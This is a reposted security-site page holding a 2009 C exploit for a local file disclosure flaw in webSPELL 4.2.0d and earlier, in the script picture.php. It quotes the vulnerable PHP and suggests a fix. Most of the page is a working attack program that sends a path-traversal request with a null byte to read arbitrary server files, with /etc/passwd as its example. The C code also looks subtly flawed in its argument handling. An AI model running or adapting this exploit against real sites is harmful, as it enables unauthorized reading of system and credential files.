首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
webSPELL <= 4.2.0d Local File Disclosure Exploit (.c linux)
来源:staker[at]hotmail[dot]it 作者:staker 发布时间:2009-04-29  
/*
* webSPELL <= 4.2.0d Local File Disclosure Exploit (.c linux)
*
* by Juri Gianni aka yeat - staker[at]hotmail[dot]it
*
* Description
* -----------
* webSPELL contains one flaw that allows an attacker
* to disclose a local file. The issue is due to 'picture.php'
* script not properly sanitizing user input supplied to
* the 'file' GET variable.
* -----------
* Vulnerability already found by Trex on 4.01.02 version.
* Not Fixed. it works with magic_quotes_gpc OFF
* Visit http://zeroidentity.org
*
* Download on http://www.webspell.org/download.php?fileID=22
*
* (File: picture.php) code details
* --------------------------------

  if(file_exists('images/gallery/large/'.$_GET['id'].'.jpg'))
      $file='images/gallery/large/'.$_GET['id'].'.jpg';
 
  elseif(file_exists('images/gallery/large/'.$_GET['id'].'.gif'))
      $file='images/gallery/large/'.$_GET['id'].'.gif';
 
  elseif(file_exists('images/gallery/large/'.$_GET['id'].'.png'))
      $file='images/gallery/large/'.$_GET['id'].'.png';
 
  else $file='';

  $info=getimagesize($file);
 
  switch($info[2]) {
case 1: Header("Content-type: image/gif"); break;
case 2: Header("Content-type: image/jpeg"); break;
case 3: Header("Content-type: image/png"); break;
  }

echo file_get_contents($file);
?>
 
* ------------------------------
* Possible Fix:
*
* $file = preg_replace('/[^a-zA-Z0-9\_]/','',addslashes($_GET['id']));
*
* otherwise if $_GET['id'] variable is an integer use intval() function.
*
* $file = intval($_GET['id']);
*
* -----------------------------
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>


#define GET  "GET %s/picture.php?id=%s HTTP/1.1\r\n" \
             "Host: %s\r\n" \
             "User-Agent: Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)\r\n" \
             "Connection: close\r\n\r\n"
            
            

char *getHost (char *host)
{
    struct hostent *hp;
    struct in_addr **y;
   
    hp = gethostbyname(host);
    y = (struct in_addr **)hp->h_addr_list;
   
    return inet_ntoa(**y);
}


int main (int argc,char **argv)
{
    int server,leak;
    char data[1024],html[5000];
    char packet[500],loadsf[5000];

    struct sockaddr_in addr;
   
    if (argc < 3) {
       printf("Usage: %s host /path file\n",argv[0]);
       printf("RunEx: %s localhost /webSPELL ../../../../../etc/passwd\n",argv[0]);
       exit(0);
    }  
   
    server = socket(AF_INET,SOCK_STREAM,0);
   
    addr.sin_family = AF_INET;
    addr.sin_port = htons((int)80);
    addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));
   
    leak = connect(server,(struct sockaddr*)&addr,sizeof(addr));
   
    if (leak < 0) {
       printf("connection refused..try again\n");
       exit(0);
    }  
   
    strncat(argv[3],"%00",sizeof(argv[3]));
    snprintf(packet,sizeof(packet),GET,argv[2],argv[3],argv[1]);  
       
    if (send(server,packet,sizeof(packet),0) < 0) {
       printf("data sent error..\n");
    }  
      
    while(recv(server,html,sizeof(html),0) > 0) {  
        printf("%s",html); 
    } 
   
    return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VisionLMS 1.0 (changePW.php) R
·C版本的批量注入代码工具 Inject
·Linux Kernel 2.6.x SCTP FWD Me
·Adobe Reader javascript this.s
·iodined <= 0.4.2 DoS exploit
·Adobe Reader javascript getAnn
·SDP Downloader version 2.3.0 l
·Google Chrome version 1.0.154.
·Absolute Form Processor XE-V v
·Autodesk IDrop ActiveX Remote
·Zervit HTTP Server versions 0.
·Quick 'n Easy Web Server 3.3.5
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved